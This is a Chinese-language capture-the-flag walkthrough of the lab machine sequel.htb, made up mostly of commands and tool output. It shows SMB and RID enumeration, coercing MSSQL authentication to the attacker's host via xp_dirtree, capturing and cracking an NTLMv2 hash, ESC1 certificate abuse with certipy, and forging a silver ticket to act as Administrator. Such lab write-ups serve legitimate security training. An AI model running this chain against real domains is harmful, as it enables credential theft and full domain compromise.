系统:windows
内容:ADCS攻击,白银票据
端口扫描。将sequel.htb和dc.sequel.htb加入hosts。
~/D/e $auto_nmap.sh $IP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 08:08:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:08+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m05s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-21T07:51:15
| Not valid after: 2055-01-21T07:51:15
| MD5: 6517:36fa:5f97:b105:f9c4:d9bc:ca85:39ae
|_SHA-1: c9d8:f6e3:9a9d:59c3:e010:89f4:5c55:a74c:7249:f6d1
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-21T08:10:09+00:00; +7h44m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
|_SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
|_ssl-date: 2025-01-21T08:10:08+00:00; +7h44m04s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49728/tcp open msrpc Microsoft Windows RPC
49750/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows目前没有账号信息提示,只能利用空账号进行一些基本信息检索。先看smb,public文件夹可读。
~/D/e $crackmapexec smb $IP -u 'null' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\null:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share下载pdf文件,查看
~/D/e $smbclient //$IP/Public -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1475340 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (41.4 KiloBytes/sec) (average 41.4 KiloBytes/sec)查看pdf文件,可以发现两个用户名ryan和brandon,以及一个sql server默认登录账号PublicUser:GuestUserCantWrite1。
可以先用rid爆破的方式得到一些用户名。
~/D/e $netexec smb $IP -u 'anonymous' -p '' --rid-brute 10000 |grep SidTypeUser |awk '{print $6}' |cut -d '\' -f2 | tee names.txt
Administrator
Guest
krbtgt
DC$
Tom.Henn
Brandon.Brown
Ryan.Cooper
sql_svc
James.Roberts
Nicole.Thompson使用pdf提供的默认账户可以登录sql,但看数据库,没有特别的库。
~/D/e $mssqlclient.py PublicUser:GuestUserCantWrite1@$IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> select name from sys.databases
name
------
master
tempdb
model
msdb尝试了一下,PublicUser账户没有权限运行xp_cmdshell,但可以执行xp_dirtree访问远程主机来使其强制验证。
SQL (PublicUser guest@master)> EXEC MASTER.sys.xp_dirtree '\\10.10.16.11\kali', 1, 1
subdirectory depth file
------------ ----- ----本机可以得到sql_svc的NTLM hash。
~/D/e $sudo responder -I tun0 -Pdv
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:70c5cd1859199a79:A62EEBE023AFFEAC2C1A8B065AA337EE:010100000000000080251129AF6BDB01E0022C8A5ECF36B4000000000200080037004A005600510001001E00570049004E002D004800310033004100380043005200510037005300380004003400570049004E002D00480031003300410038004300520051003700530038002E0037004A00560051002E004C004F00430041004C000300140037004A00560051002E004C004F00430041004C000500140037004A00560051002E004C004F00430041004C000700080080251129AF6BDB01060004000200000008003000300000000000000000000000003000009F06AAB032DCD56AF8E337ECE6D496825D2DE220BC3259322DAA6E19E0F622E80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310031000000000000000000离线破解得到sql_svc的密码。
~/D/e $john --wordlist=/usr/share/wordlists/rockyou.txt sql_svc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:03 DONE (2025-01-21 02:52) 0.3076g/s 3292Kp/s 3292Kc/s 3292KC/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.验证一下账户权限,可以登录smb和ldap。
~/D/e $check_auth.sh $IP -u sql_svc -p REGGIE1234ronnie
Running: netexec smb 10.10.11.202 -u null -p null
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\null:null (Guest)
----------------------------------------
Running: netexec winrm 10.10.11.202 -u null -p null
WINRM 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM 10.10.11.202 5985 DC [-] sequel.htb\null:null
----------------------------------------
Running: netexec ldap 10.10.11.202 -u null -p null
/opt/check_auth.sh: line 57: warning: command substitution: ignored null byte in input
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAPS 10.10.11.202 636 DC [+] sequel.htb\null:null收集bloodhound信息。
~/D/e $netexec ldap $IP -u sql_svc -p 'REGGIE1234ronnie' --bloodhound --collection All --dns-server $IP
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.202 636 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie
LDAPS 10.10.11.202 636 DC Resolved collection methods: container, trusts, acl, group, psremote, rdp, objectprops, session, dcom, localadmin
LDAP 10.10.11.202 389 DC Done in 00M 20S
LDAPS 10.10.11.202 636 DC Compressing output into /home/kali/.nxc/logs/DC_10.10.11.202_2025-01-21_025545_bloodhound.zipsql_svc属于Remote Management Users组,可以登录shell。
~/D/e $bloodyAD --host dc.sequel.htb -d sequel.htb -u sql_svc -p REGGIE1234ronnie get object sql_svc --attr memberOf
distinguishedName: CN=sql_svc,CN=Users,DC=sequel,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=sequel,DC=htb使用evil-winrm登录靶机,查看用户目录,看来下一步就是获得用户ryan。
~/D/e $evil-winrm -i $IP -u sql_svc -p REGGIE1234ronnie
...
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc在SQLServer文件夹下发现一个error备份文件,里面有ryan用户名和可疑字符串。
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...验证这个可疑字符串是否是密码。
~/D/e $netexec smb $IP -u names.txt -p 'NuclearMosquito3'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [-] sequel.htb\Administrator:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Guest:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\krbtgt:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\DC$:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Tom.Henn:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [-] sequel.htb\Brandon.Brown:NuclearMosquito3 STATUS_LOGON_FAILURE
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3以ryan身份登录shell。
~/D/e $evil-winrm -i $IP -u ryan.cooper -p 'NuclearMosquito3'
...登录shell后浏览一番,并没有可利用的地方,且bloodhound中也没有找到可用路径。再查看一下ADCS服务有没有漏洞。
~/D/e $certipy find -scheme ldap -u ryan.cooper@sequel.htb -p NuclearMosquito3 -debug -target dc.sequel.htb -dc-ip $IP -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc.sequel.htb' at '10.10.11.202'
[+] Authenticating to LDAP server
[!] LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.202:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
SEQUEL.HTB\Authenticated Users (SEQUEL.HTB-S-1-5-11)
SEQUEL.HTB\Access Control Assistance Operators (SEQUEL.HTB-S-1-5-32-580)
SEQUEL.HTB\Users (SEQUEL.HTB-S-1-5-32-545)
SEQUEL.HTB\Ryan.Cooper (S-1-5-21-4078382237-1492182817-2568127209-1105)
SEQUEL.HTB\Domain Users (S-1-5-21-4078382237-1492182817-2568127209-513)
SEQUEL.HTB\Everyone (SEQUEL.HTB-S-1-1-0)
SEQUEL.HTB\Domain Computers (S-1-5-21-4078382237-1492182817-2568127209-515)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Resolved 'dc.sequel.htb' from cache: 10.10.11.202
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.11.202
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sequel.htb' (10.10.11.202)
[*] Got CA configuration for 'sequel-DC-CA'
[+] Resolved 'dc.sequel.htb' from cache: 10.10.11.202
[+] Connecting to 10.10.11.202:80
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication信息显示,UserAuthentication模板是可利用的。可以以ryan用户申请一个administrator的证书,保存为pfx文件。如果遇到NETBIOS错误,就多运行几遍。
~/D/e $certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
~/D/e $certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'先和服务器同步一下时间。
~/D/e $sudo ntpdate -u $IP
2025-01-21 11:27:55.456950 (+0100) +27844.017766 +/- 0.049238 10.10.11.202 s1 no-leap
CLOCK: time stepped by 27844.017766在利用pfx文件获取TGT时,指令总是出错。
~/D/e $certipy auth -pfx ./administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)最后,还是利用了白银票据。
在Kerberos认证过程的TGS-REP阶段,在验证了客户端发来的TGT的真实性和会话 安全性后,KDC的TGS票据授予服务将返回指定服务的ST。ST中加密部分authorization-data是使用服务密钥加密的,而authorization-data中存放着代表用户身份的PAC,并且在这个阶段PAC的PAC_SERVER_CHECKSUM签名的密钥也是服务密钥(该阶段PAC的PAC_PRIVSVR_CHECKSUM签名的密钥是krbtgt密钥,此时客户端并不能伪造PAC_PRIVSVR_CHECKSUM签名)。但是由于PAC_PRIVSVR_CHECKSUM签名的验证是可选的,并且默认不开启,因此即使攻击者无法伪造PAC_PRIVSVR_CHECKSUM签名,也能利用该ST以高权限进行正常请求。
因此,只要安全研究员能拥有指定服务的密钥,就能够伪造高权限的PAC,然后将其封装在ST中,并对其进行PAC_SERVER_CHECKSUM签名和加密。客户端再利用这个ST以高权限访问指定服务。这个攻击过程被称为白银票据传递攻击。
要创建白银票据,我们需要知道以下信息:
❑目标服务的密钥;
❑域的SID值;
❑域名;
❑要伪造的域用户,一般填写高权限账户,如域管理员。
靶机运行着sql服务,用户为sql_svc,我们有其明文密码。
将sql_svc的密码转为NTHash,有许多工具可以将密码转为NTHash,如CyberChef。
BloodHound中可以查看到DomainSID为S-1-5-21-4078382237-1492182817-2568127209。
执行如下命令获取票据。
~/D/e $impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache利用该票据就可以以administrator身份登录sql。
~/D/e $KRB5CCNAME=administrator.ccache mssqlclient.py -k dc.sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sequel\Administrator dbo@master)>运行如下指令可以读取root flag。美中不足是得不到administrator的shell。
SQL (sequel\Administrator dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) AS Contents
BulkColumn